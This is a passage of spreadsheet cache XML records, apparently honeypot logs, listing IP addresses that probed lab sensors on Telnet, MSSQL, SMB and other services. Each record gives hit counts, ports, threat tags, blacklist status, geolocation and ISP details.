    <x v="905"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T15:25:28"/>
    <d v="2025-04-24T08:27:22"/>
    <d v="2025-04-24T15:25:28"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="MA"/>
    <s v="Morocco"/>
    <s v="09"/>
    <s v="Souss-Massa"/>
    <s v="Tiznit Province"/>
    <s v="Sidi Ifni"/>
    <s v="2534515"/>
    <s v="NA"/>
    <s v="29.3797"/>
    <s v="-10.173"/>
    <s v="36903"/>
    <s v="Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM"/>
    <s v="Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM"/>
    <s v="business"/>
    <s v="MarocTelecomASDL"/>
    <s v="2014-11-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a0b2:644e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="906"/>
    <x v="906"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T15:10:11"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-24T15:10:11"/>
    <n v="145"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_DNS_H30&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;53&amp;&amp;21536&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="CL"/>
    <s v="Chile"/>
    <s v="RM"/>
    <s v="Santiago Metropolitan"/>
    <s v="Provincia de Santiago"/>
    <s v="Providencia"/>
    <s v="3875139"/>
    <s v="NA"/>
    <s v="-33.4311"/>
    <s v="-70.6045"/>
    <s v="18747"/>
    <s v="IFX Corporation"/>
    <s v="IFX Corporation"/>
    <s v="business"/>
    <s v="IFX Networks Chile S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c849:22a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="907"/>
    <x v="907"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T15:08:29"/>
    <d v="2025-04-23T20:37:55"/>
    <d v="2025-04-24T15:08:29"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:4b75"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="908"/>
    <x v="908"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T14:41:04"/>
    <d v="2025-01-07T15:16:23"/>
    <d v="2025-04-24T14:41:04"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="North 24 Parganas"/>
    <s v="Ula"/>
    <s v="1349247"/>
    <s v="NA"/>
    <s v="22.7225"/>
    <s v="88.5556"/>
    <s v="23860"/>
    <s v="Alliance Broadband Services Pvt. Ltd."/>
    <s v="Alliance Broadband Services"/>
    <s v="residential"/>
    <s v="Alliance Broadband Services Pvt. Ltd."/>
    <s v="2008-09-11"/>
    <s v="ALLIANCEBROADBAND-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73bb:3191"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="909"/>
    <x v="909"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T14:20:44"/>
    <d v="2025-01-22T13:50:06"/>
    <d v="2025-04-24T14:20:44"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445&amp;&amp;54705&amp;&amp;54738"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surendranagar"/>
    <s v="Limbdi"/>
    <s v="1264912"/>
    <s v="NA"/>
    <s v="22.5651"/>
    <s v="71.8108"/>
    <s v="45916"/>
    <s v="Gujarat Telelink Pvt Ltd"/>
    <s v="GTPL Kuttch N/W Pvt. Ltd"/>
    <s v="residential"/>
    <s v="Gtpl Broadband Pvt. Ltd."/>
    <s v="2014-09-01"/>
    <s v="GUJARATKUTCHNETWORK"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (43.242.117.89,55867)}&amp;&amp;{Data_SMB:Incoming connection (43.242.117.89,56588)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2bf2:7559"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="910"/>
    <x v="910"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T14:14:41"/>
    <d v="2024-01-05T06:36:00"/>
    <d v="2025-04-24T14:14:41"/>
    <n v="46037"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;5900&amp;&amp;55877&amp;&amp;1433&amp;&amp;3306&amp;&amp;445&amp;&amp;5900&amp;&amp;37168&amp;&amp;51457&amp;&amp;51470"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="1989-10-03"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:88e8:ed8a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="911"/>
    <x v="911"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T14:10:35"/>
    <d v="2023-11-27T14:23:09"/>
    <d v="2025-04-24T14:10:35"/>
    <n v="215"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="65105&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (Vasanth Nagar)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9838"/>
    <s v="77.5969"/>
    <s v="18209"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Atria Convergence Technologies Pvt. Ltd."/>
    <s v="business"/>
    <s v="Atria Convergence Technologies Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b752:b1"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="912"/>
    <x v="912"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T14:10:19"/>
    <d v="2024-12-06T16:04:15"/>
    <d v="2025-04-24T14:10:19"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H32"/>
    <s v="1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="NA"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="NA"/>
    <s v="19.0728"/>
    <s v="72.8826"/>
    <s v="132296"/>
    <s v="Seven Star Digital Network Private Limited"/>
    <s v="Seven Star Digital Network Private Limited"/>
    <s v="business"/>
    <s v="Seven Star Digital Network Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6748:491e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="913"/>
    <x v="913"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T13:42:27"/>
    <d v="2024-04-14T11:09:10"/>
    <d v="2025-04-24T13:42:27"/>
    <n v="72"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_MSSQL_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;5659"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="119"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="LT"/>
    <s v="Lithuania"/>
    <s v="KU"/>
    <s v="Kaunas"/>
    <s v="Kaunas"/>
    <s v="Kaunas"/>
    <s v="598316"/>
    <s v="44001"/>
    <s v="54.9072"/>
    <s v="24.0019"/>
    <s v="209605"/>
    <s v="UAB Host Baltic"/>
    <s v="UAB Host Baltic"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="2019-01-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8d62:b62"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="914"/>
    <x v="914"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T13:26:32"/>
    <d v="2023-11-30T10:00:39"/>
    <d v="2025-04-24T13:26:32"/>
    <n v="180"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_SOCKS5_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;36231&amp;&amp;39103&amp;&amp;53855&amp;&amp;1080&amp;&amp;6667&amp;&amp;56307&amp;&amp;52008&amp;&amp;54108&amp;&amp;443&amp;&amp;49386&amp;&amp;52657&amp;&amp;56087&amp;&amp;55176&amp;&amp;50975"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:8538"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="915"/>
    <x v="915"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T13:25:59"/>
    <d v="2025-04-09T13:49:02"/>
    <d v="2025-04-24T13:25:59"/>
    <n v="36"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433&amp;&amp;3306&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3125:9f23"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="916"/>
    <x v="916"/>
    <s v="NA&amp;&amp;189-70-170-131.user3p.veloxzone.com.br"/>
    <x v="0"/>
    <d v="2025-04-24T13:10:06"/>
    <d v="2023-12-26T07:51:59"/>
    <d v="2025-04-24T13:10:06"/>
    <n v="2331"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;25178&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MA"/>
    <s v="Maranhão"/>
    <s v="Santa Inês"/>
    <s v="Santa Inês"/>
    <s v="3389609"/>
    <s v="NA"/>
    <s v="-3.66667"/>
    <s v="-45.38"/>
    <s v="7738"/>
    <s v="V tal"/>
    <s v="V tal"/>
    <s v="business"/>
    <s v="Telemar Norte Leste S.A."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bd46:aa83"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="917"/>
    <x v="917"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T12:58:58"/>
    <d v="2025-01-14T13:29:39"/>
    <d v="2025-04-24T12:58:58"/>
    <n v="106"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Aurangabad"/>
    <s v="Aurangabad (Venkatesh Nagar)"/>
    <s v="1278149"/>
    <s v="431001"/>
    <s v="19.8788"/>
    <s v="75.3474"/>
    <s v="132770"/>
    <s v="Gazon Communications India Limited"/>
    <s v="SecureLayer7"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2016-05-31"/>
    <s v="SECURE7"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,64230)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,64524)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,62208)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,62510)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,53851)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,53868)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,54329)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,57424)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,57442)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,57779)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,50388)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,50444)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,51740)}&amp;&amp;{Data_SMB:User  authenticated 